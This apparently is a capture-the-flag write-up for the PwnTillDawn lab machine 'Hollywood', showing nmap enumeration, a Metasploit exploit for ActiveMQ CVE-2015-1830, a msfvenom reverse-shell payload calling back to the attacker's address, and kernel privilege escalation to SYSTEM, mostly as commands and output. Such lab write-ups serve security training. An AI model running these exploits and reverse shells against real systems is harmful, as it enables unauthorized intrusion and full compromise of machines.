Post

PwnTillDawn - Hollywood


Hollywood from PwnTillDawn is running

Enumeration

nmap

We start an Nmap scan using the following command: sudo nmap -sC -sV -T4 {target_IP}.

  • -sC: run all the default scripts.

  • -sV: Find the version of services running on the target.

  • -T4: Aggressive scan to provide faster results.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
Nmap scan report for 10.150.150.219      
Host is up (0.16s latency).              
Not shown: 976 closed tcp ports (reset)  
PORT      STATE SERVICE      VERSION     
21/tcp    open  ftp          FileZilla ftpd 0.9.41 beta             
| ftp-syst:           
|_  SYST: UNIX emulated by FileZilla     
25/tcp    open  smtp         Mercury/32 smtpd (Mail server account Maiser)         
|_smtp-commands: localhost Hello nmap.scanme.org; ESMTPs are:, TIME 
79/tcp    open  finger       Mercury/32 fingerd                     
| finger: Login: Admin         Name: Mail System Administrator\x0D  
| \x0D 
|_[No profile information]\x0D           
80/tcp    open  http         Apache httpd 2.4.34 ((Win32) OpenSSL/1.0.2o PHP/5.6.38)                  
|_http-server-header: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38              
| http-title: Welcome to XAMPP           
|_Requested resource was http://10.150.150.219/dashboard/           
106/tcp   open  pop3pw       Mercury/32 poppass service             
110/tcp   open  pop3         Mercury/32 pop3d                       
|_pop3-capabilities: UIDL USER TOP APOP EXPIRE(NEVER)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
143/tcp   open  imap         Mercury/32 imapd 4.62
|_imap-capabilities: complete CAPABILITY OK AUTH=PLAIN IMAP4rev1 X-MERCURY-1A0001
443/tcp   open  ssl/http     Apache httpd 2.4.34 ((Win32) OpenSSL/1.0.2o PHP/5.6.38)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47          
|_Not valid after:  2019-11-08T23:48:47          
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
| tls-alpn:  
|_  http/1.1
| http-title: Welcome to XAMPP
|_Requested resource was https://10.150.150.219/dashboard/
445/tcp   open  microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
554/tcp   open  rtsp?
2869/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3306/tcp  open  mysql        MariaDB (unauthorized)
8009/tcp  open  ajp13        Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp  open  http         Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.56
8089/tcp  open  ssl/http     Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-10-28T09:17:32
|_Not valid after:  2022-10-27T09:17:32
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
8161/tcp  open  http     syn-ack Jetty 8.1.16.v20140903
|_http-favicon: Unknown favicon MD5: 05664FB0C7AFCD6436179437E31F3AA6
|_http-title: Apache ActiveMQ
|_http-server-header: Jetty(8.1.16.v20140903)
| http-methods: 
|_  Supported Methods: GET HEAD
10243/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  unknown
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  msrpc        Microsoft Windows RPC
61613/tcp open  stomp    syn-ack Apache ActiveMQ 5.10.1 - 5.11.1
61614/tcp open  http     syn-ack Jetty 8.1.16.v20140903
Service Info: Hosts: localhost, HOLLYWOOD; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-04-22T10:35:24
|_  start_date: 2020-04-02T14:13:04
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
|_clock-skew: mean: -2h18m10s, deviation: 4h37m03s, median: 21m46s
| smb-os-discovery: 
|   OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: Hollywood
|   NetBIOS computer name: HOLLYWOOD\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-04-22T18:35:26+08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

The target is a windows box with multiple ports open. We have mail services(POP3, IMAP, SMTP), HTTP servers(Apache, IIS…) and the typical windows services like SMB and msrpc.

There is a lot to go through in this box but I will go directly to the how I gained foothold on this box.

Foothold

After checking all the services for default credential authentication, outdated and vulnerable services we finally find a hit with port 61613

1
61613/tcp open  stomp    syn-ack Apache ActiveMQ 5.10.1 - 5.11.1

This port is running ActiveMQ 5.10.1 - 5.11.1, and after some research on google with find the CVE-2015-1830.

Directory traversal vulnerability in the fileserver upload/download functionality for blob messages in Apache ActiveMQ 5.x before 5.11.2 for Windows allows remote attackers to create JSP files in arbitrary directories via unspecified vectors.

The exploit for this vulnerability can be found in metasploit with the name exploit/multi/http/apache_activemq_upload_jsp.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
[msf](Jobs:0 Agents:0) exploit(multi/http/apache_activemq_upload_jsp) >> set rhosts 10.150.150.219
rhosts => 10.150.150.219
[msf](Jobs:0 Agents:0) exploit(multi/http/apache_activemq_upload_jsp) >> set lhost tun0
lhost => 10.66.66.230
[msf](Jobs:0 Agents:0) exploit(multi/http/apache_activemq_upload_jsp) >> exploit
[*] Started reverse TCP handler on 10.66.66.230:4444 
[*] Uploading http://10.150.150.219:8161/C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin\../webapps/api//DhYnsDUvYhY.jar
[*] Uploading http://10.150.150.219:8161/C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin\../webapps/api//DhYnsDUvYhY.jsp
[*] Sending stage (58073 bytes) to 10.150.150.219
[+] Deleted C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin\../webapps/api//DhYnsDUvYhY.jsp
[*] Meterpreter session 1 opened (10.66.66.230:4444 -> 10.150.150.219:49316) at 2025-04-22 12:32:02 +0100
[!] This exploit may require manual cleanup of 'C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin\../webapps/api//DhYnsDUvYhY.jar' on the target

(Meterpreter 1)(C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin) > getuid
Server username: User

Privilege Escalation

Now let’s run exploit suggester module.

We background our session and select the module

1
2
3
(Meterpreter 3)(C:\Users\User\Downloads) > background
[*] Backgrounding session 1...
[msf](Jobs:0 Agents:1) exploit(multi/http/apache_activemq_upload_jsp) >> use post/multi/recon/local_exploit_suggester

Now we set the session and run the module

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> set session 1  
session => 1          
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> exploit        
[*] 10.150.150.219 - Collecting local exploits for java/windows...  
[*] 10.150.150.219 - 202 exploit checks are being tried...          
[+] 10.150.150.219 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.       
[+] 10.150.150.219 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.             
[+] 10.150.150.219 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.                  
[+] 10.150.150.219 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.         
[*] Running check method for exploit 42 / 42                        
[*] 10.150.150.219 - Valid modules for session 1:                   
============================             

 #   Name             Potentially Vulnerable?  Check Result                        
 -   ----             -----------------------  ------------                        
 1   exploit/windows/local/ikeext_serviceYes                      The target appears to be vulnerable.
 2   exploit/windows/local/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.
 3   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.
 4   exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.   

We got 4 exploits but after trying them nothing worked.

Let’s try upgrading our meterpreter shell from java/meterpreter/reverse_tcp to windows/meterpreter/reverse_tcp

First we generate the payload using msfvenom

1
2
3
4
5
6
7
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.66.66.230 LPORT=5555 -f exe -o rev.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: rev.exe

I’ll setup a multi handler listener with the same options we used in the msfvenom command above and run it in the background with run -j.

1
2
3
4
5
6
7
8
9
10
11
12
13
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> use multi/handler
[*] Using configured payload generic/shell_reverse_tcp         
[msf](Jobs:0 Agents:1) exploit(multi/handler) >> set payload windows/meterpreter/reverse_tcp                 
payload => windows/meterpreter/reverse_tcp      
[msf](Jobs:0 Agents:1) exploit(multi/handler) >> set lhost tun0
lhost => tun0        
[msf](Jobs:0 Agents:1) exploit(multi/handler) >> set lport 5555
lport => 5555                                
[msf](Jobs:0 Agents:1) exploit(multi/handler) >> run -j        
[*] Exploit running as background job 0.        
[*] Exploit completed, but no session was created.             
[msf](Jobs:1 Agents:1) exploit(multi/handler) >>
[*] Started reverse TCP handler on 10.66.66.230:5555 

I’ll go back the meterpreter session with session 1 and upload the rev.exe file we created.

1
2
3
4
5
(Meterpreter 1)(C:\Users\User\Downloads) > upload rev.exe
[*] Uploading  : /home/sirius/ctf/ptd/hollywood/rev.exe -> rev.exe
[*] Uploaded -1.00 B of 72.07 KiB (-0.0%): /home/sirius/ctf/ptd/hollywood/rev.exe -> rev.exe
[*] Completed  : /home/sirius/ctf/ptd/hollywood/rev.exe -> rev.exe
(Meterpreter 1)(C:\Users\User\Downloads) >

Now I’ll drop to a normal shell and run the exe file.

1
2
3
4
5
6
C:\Users\User\Downloads>.\rev.exe
.\rev.exe

C:\Users\User\Downloads>
[*] Sending stage (177734 bytes) to 10.150.150.219
background[*] Meterpreter session 2 opened (10.66.66.230:5555 -> 10.150.150.219:49289) at 2025-04-26 11:17:11 +0100

We got the new meterpreter session.

Let’s exit the current session and go back to exploit suggester, set the new session and rerun it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
[msf](Jobs:0 Agents:2) post(multi/recon/local_exploit_suggester) >> exploit                                                                                                         [153/1476]
[*] 10.150.150.219 - Collecting local exploits for x86/windows...
[*] 10.150.150.219 - 202 exploit checks are being tried...
[+] 10.150.150.219 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detec
ted!
[+] 10.150.150.219 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 42 / 42
[*] 10.150.150.219 - Valid modules for session 4:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_comhijack                      Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 b
uild detected!
 4   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.
 5   exploit/windows/local/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.
 6   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/ms15_004_tswbproxy                       Yes                      The service is running, but could not be validated.
 8   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.
 9   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.
 10  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
 11  exploit/windows/local/ntusermndragover                         Yes                      The target appears to be vulnerable.
 12  exploit/windows/local/tokenmagic                               Yes                      The target appears to be vulnerable.

We got more results this time!

Trying the new ones, exploit/windows/local/ntusermndragover gives us a system shell.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[msf](Jobs:0 Agents:1) exploit(windows/local/ntusermndragover) >> run
[*] Started reverse TCP handler on 10.66.66.230:4443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Reflectively injecting the exploit DLL and running the exploit...
[*] Launching msiexec to host the DLL...
[+] Process 5552 launched.
[*] Reflectively injecting the DLL into 5552...               
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (177734 bytes) to 10.150.150.219
[*] Meterpreter session 5 opened (10.66.66.230:4443 -> 10.150.150.219:49292) at 2025-04-26 11:22:23 +0100

(Meterpreter 5)(C:\Users\User\Downloads) > getuid             
Server username: NT AUTHORITY\SYSTEM        

References

https://nvd.nist.gov/vuln/detail/cve-2015-1830


Thank you for taking the time to read my write-up, I hope you have learned something from this. If you have any questions or comments, please feel free to reach out to me. See you in the next hack :).

This post is licensed under CC BY 4.0 by the author.